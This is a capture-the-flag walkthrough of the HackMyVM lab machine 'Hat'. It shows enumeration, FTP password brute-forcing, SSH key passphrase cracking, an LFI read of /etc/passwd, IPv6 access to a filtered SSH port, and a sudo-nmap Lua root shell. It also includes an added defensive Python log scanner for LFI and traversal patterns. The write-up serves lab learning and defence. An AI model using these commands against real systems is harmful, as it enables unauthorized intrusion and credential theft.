Writeup of Hat from HackMyVM – Walkthrough
Hat is a great machine from HackMyVM by d4t4s3c. The machine is not straightforward and one has to think laterally. It also covers techniques and vulnerabilities such as local file inclusion, bruteforcing, and more. The machine works quite well on VirtualBox.
Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Hat
Identify the target
Firstly, I identified the IP address of the target machine.
sudo netdiscover -r 10.0.0.0/24
Scan open ports
Next, I scanned the open ports on the target.
nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.40
Here, we can see that the SSH port is filtered. Similarly, the FTP service is running on port 65535. Lastly, we have an HTTP port.
Enumerate the webserver
The homepage is the default page of the Apache server. Hence, I performed directory enumeration on the server.
gobuster dir -r -u http://10.0.0.40 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -o dir-medium.log
Now, I had two more paths to explore. Since one of the directories is named logs, I searched it for log files.
gobuster dir -r -u http://10.0.0.40/logs -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x log -o dir-logs-medium.log
I found a file “vsftpd.log” in that directory and opened it.
From the log file, I got a possible FTP username, since the log showed it logging in. To get the password, I simply bruteforced it using rockyou.txt.
ncrack -v -f --user ftp_s3cr3t -P /home/kali/rockyou.txt ftp://10.0.0.40:65535
Log into the FTP server
Now that I had the password of the user ftp_s3cr3t, I logged into the FTP server.
lftp -u ftp_s3cr3t 10.0.0.40 -p 65535
Upon opening the id_rsa file from the FTP server, I found out that it is encrypted. Hence, I bruteforced its passphrase.
~/ssh2john.py id_rsa > hash
john hash --wordlist=/home/kali/rockyou.txt
Although I found the SSH private key and its passphrase, I still didn’t have a username or a reachable SSH service to log into. However, my lftp client showed me the username as cromiphi. But this might not be the intended way. So, let’s find the username by exploiting LFI.
Local File Inclusions
Previously, we found a directory “/php-scripts” on the server. This suggests that there might be some vulnerable scripts. So, let’s enumerate filenames with the PHP extension.
gobuster dir -r -u http://10.0.0.40/php-scripts -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -o dir-php-scripts-medium.log
This instantly gave me a /file.php path. Furthermore, the name suggests the possibility of LFI. Then, I identified the parameter name for the LFI by fuzzing it and filtering out empty responses.
ffuf -c -ic -r -u 'http://10.0.0.40/php-scripts/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0
The parameter turned out to be named 6, and reading /etc/passwd through it gave me the username.
curl 'http://10.0.0.40/php-scripts/file.php?6=/etc/passwd'
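From the defender's side, the requests above leave a clear trace in the Apache access log. The following is an added example (not part of the original writeup or the machine) that scans constructed access-log lines for the file-inclusion indicators seen here: absolute paths to sensitive files, `../` traversal (including double-encoded forms), and PHP stream wrappers. The log format and sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-log lines (assumed format), not taken from the machine.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:12:00:01 +0000] "GET /php-scripts/file.php?6=/etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.74.0"
10.0.0.5 - - [10/Jan/2021:12:00:02 +0000] "GET /php-scripts/file.php?admin=../../../../../etc/passwd HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool"
10.0.0.5 - - [10/Jan/2021:12:00:03 +0000] "GET /php-scripts/file.php?6=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.0.0.7 - - [10/Jan/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2021:12:00:05 +0000] "GET /php-scripts/file.php?6=about.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Indicators of inclusion / traversal attempts in a parameter value.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE_RE = re.compile(r'^/(etc/(passwd|shadow|hosts)|proc/self/environ|var/log/)')
WRAPPER_RE = re.compile(r'^(php|data|expect|file)://', re.IGNORECASE)

def decode_param(value, rounds=2):
    """Percent-decode repeatedly so double-encoded traversal (%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_value(value):
    """Return a reason if the parameter value looks like an LFI attempt, else None."""
    v = decode_param(value)
    if TRAVERSAL_RE.search(v):
        return "path traversal"
    if SENSITIVE_RE.match(v):
        return "absolute sensitive path"
    if WRAPPER_RE.match(v):
        return "php stream wrapper"
    return None

def scan_log(text):
    """Return (client_ip, status, param_name, reason) for each suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query  # parse_qsl decodes one layer itself
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                findings.append((m.group("ip"), int(m.group("status")), name, reason))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status with a non-zero response size on a hit is the case worth alerting on first, since it indicates the include actually succeeded.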
Finally, I had everything except a port to connect to.
IPv6 enumeration
I tried to unlock the SSH port by searching for a knockd.conf, but it didn’t look like the target used knockd. With a little hint from the Discord user avijneyam, I found out that the port is open when it is reached over IPv6. This is a common misconfiguration worth checking on your own hosts: on Linux, iptables rules only apply to IPv4, so a service blocked there stays reachable over IPv6 unless matching ip6tables (or nftables inet family) rules exist.
Thus, I needed the link-local address of the target. Addressing works differently in IPv6 than in IPv4, but we can discover the link-local addresses on the network by pinging the all-nodes multicast address with the ping6 command.
ping6 -c2 -n -I eth0 ff02::1
The highlighted address is the link-local IPv6 address of the target; the other one belongs to my machine, which can be confirmed with ip a.
ip a
To confirm that port 22 is open over IPv6, we can run an nmap scan against the link-local address (the %eth0 suffix selects the interface, which is required for link-local addresses).
nmap -p- fe80::a00:27ff:fe01:a372%eth0 -6 -v
Since the SSH port is open over IPv6, we can log in with the recovered key.
chmod 600 id_rsa
ssh cromiphi@fe80::a00:27ff:fe01:a372%eth0 -i id_rsa
Root privilege escalation
Finally, I came to the root privilege escalation part, which is the easiest step on this machine. When I checked the sudo permissions, I found that we can execute nmap as root. Since nmap can run Lua scripts, this leads directly to a root shell.
Reference: https://gtfobins.github.io/gtfobins/nmap/#sudo
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF
reset